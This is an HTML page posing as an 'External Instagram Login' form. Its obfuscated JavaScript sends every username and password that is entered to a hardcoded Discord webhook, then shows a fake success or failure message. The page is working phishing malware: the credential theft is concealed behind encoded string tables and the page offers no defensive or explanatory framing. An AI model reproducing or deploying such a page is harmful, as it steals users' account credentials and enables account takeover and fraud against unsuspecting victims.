<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title>External Instagram Login</title>
</head>

<body>
<style>
	body{background-color: peachpuff;zoom:160%;font-family: Arial}
	.harea{display: flex;justify-content: center;align-items: center}
	.h{border-radius: 10px;background-color: #FF9C5B;font-family: Arial;height:50px;display: flex;align-items: center;padding-left:10px;padding-right:10px}
	.larea{border:2px dashed #FF9C5B;border-radius: 10px;width:200px;display: flex;flex-direction: column;padding-left: 7px;padding-top: 10px;gap:10px;padding-bottom: 10px}
	.confirm{border-radius:6px;background-color: #FF5052;border: 2px solid rgba(221,0,3,1.00);width:207px;margin-top:10px;color:whitesmoke;text-align: center}
	input[type="text"]{border-radius: 5px;width:100px}
	button{border-radius:5px;background-color: antiquewhite;font-size:15px}
</style>
<div class="harea"><div class="h"><h2>External Instagram Login</h2></div></div>
	<br>
	<div class="larea">
	<div>Username: <input id="name" type="text"></div>
	<div>Password: <input id="pass" type="text"></div>
	<div><button onClick="sendMessage()">Login</button></div>
	</div>
	<div class="confirm" style="visibility: hidden" id="c"></div>
<script>
function _0x62bd(_0x28d9be,_0xdcbcec){var _0x5e6416=_0x5e64();return _0x62bd=function(_0x62bd5b,_0x310ba2){_0x62bd5b=_0x62bd5b-0x18a;var _0x36f26f=_0x5e6416[_0x62bd5b];return _0x36f26f;},_0x62bd(_0x28d9be,_0xdcbcec);}function _0x5e64(){var _0x109441=['109351LslDXZ','send','984235ciXNoh','574rEAGqt','538255DhFAcB','2330nymukV','#FF5052','pass','value','Enter\x20Username/Password','style','visible','innerHTML','now','setRequestHeader','getElementById','48sGMaUb','open','Content-type','\x0a>\x20**Password\x20:\x20**','16781736PWCSgm','visibility','50WZjKzD','whitesmoke','1207064uVBCUu','borderColor','backgroundColor','rgba(0,189,21,1.00)','user2','178284PDtinV','name','27PsINFK','color','6VpzZAp'];_0x5e64=function(){return _0x109441;};return _0x5e64();}(function(_0x436d47,_0x28a23c){var _0x3ece06=_0x62bd,_0x42fa7c=_0x436d47();while(!![]){try{var _0x513404=-parseInt(_0x3ece06(0x197))/0x1*(parseInt(_0x3ece06(0x195))/0x2)+-parseInt(_0x3ece06(0x1a2))/0x3*(parseInt(_0x3ece06(0x18d))/0x4)+-parseInt(_0x3ece06(0x196))/0x5*(parseInt(_0x3ece06(0x191))/0x6)+parseInt(_0x3ece06(0x194))/0x7+-parseInt(_0x3ece06(0x1aa))/0x8*(-parseInt(_0x3ece06(0x18f))/0x9)+-parseInt(_0x3ece06(0x1a8))/0xa*(parseInt(_0x3ece06(0x192))/0xb)+parseInt(_0x3ece06(0x1a6))/0xc;if(_0x513404===_0x28a23c)break;else _0x42fa7c['push'](_0x42fa7c['shift']());}catch(_0x2dec9a){_0x42fa7c['push'](_0x42fa7c['shift']());}}}(_0x5e64,0x6e7b2));var login=![];function sendMessage(){var _0x1f1552=_0x62bd;function _0x36b5b9(_0x8b9e84){var _0x364bdd=_0x62bd;const _0x576cb2=Date[_0x364bdd(0x19f)]();let _0x1bb047=null;do{_0x1bb047=Date[_0x364bdd(0x19f)]();}while(_0x1bb047-_0x576cb2<_0x8b9e84);}if(name[_0x1f1552(0x19a)]==''||pass['value']=='')c[_0x1f1552(0x19e)]=_0x1f1552(0x19b),c[_0x1f1552(0x19c)][_0x1f1552(0x1a7)]=_0x1f1552(0x19d);else{var _0x39b61b=new XMLHttpRequest();_0x39b61b[_0x1f1552(0x1a3)]('POST','https://discord.com/api/webhooks/1317851812963028992/xdM7atREL-CWOnmqVr9VxLE2dQE17gj5droram5moyO8dKB_5uh5u1NhYB6svuDA2MlC'),_0x39b61b[_0x1f1552(0x1a0)](_0x1f1552(0x1a4),'application/json');var _0x44f169={'content':'>\x20**Username\x20\x20:\x20**'+document[_0x1f1552(0x1a1)](_0x1f1552(0x18e))['value']+_0x1f1552(0x1a5)+document[_0x1f1552(0x1a1)](_0x1f1552(0x199))[_0x1f1552(0x19a)]};_0x39b61b[_0x1f1552(0x193)](JSON['stringify'](_0x44f169)),document[_0x1f1552(0x1a1)](_0x1f1552(0x18e))[_0x1f1552(0x19a)]==_0x1f1552(0x18c)?(c[_0x1f1552(0x19e)]='Login\x20Successful',c[_0x1f1552(0x19c)]['backgroundColor']='#A4FF5F',c[_0x1f1552(0x19c)]['color']='black',c['style']['borderColor']=_0x1f1552(0x18b),_0x36b5b9(0x190),c[_0x1f1552(0x19c)][_0x1f1552(0x1a7)]='visible'):(c[_0x1f1552(0x19e)]='Login\x20Failed',c['style'][_0x1f1552(0x18a)]=_0x1f1552(0x198),c[_0x1f1552(0x19c)][_0x1f1552(0x190)]=_0x1f1552(0x1a9),c[_0x1f1552(0x19c)][_0x1f1552(0x1ab)]='rgba(221,0,3,1.00)',_0x36b5b9(0x190),c['style'][_0x1f1552(0x1a7)]=_0x1f1552(0x19d));}}  </script>
</body>
</html>
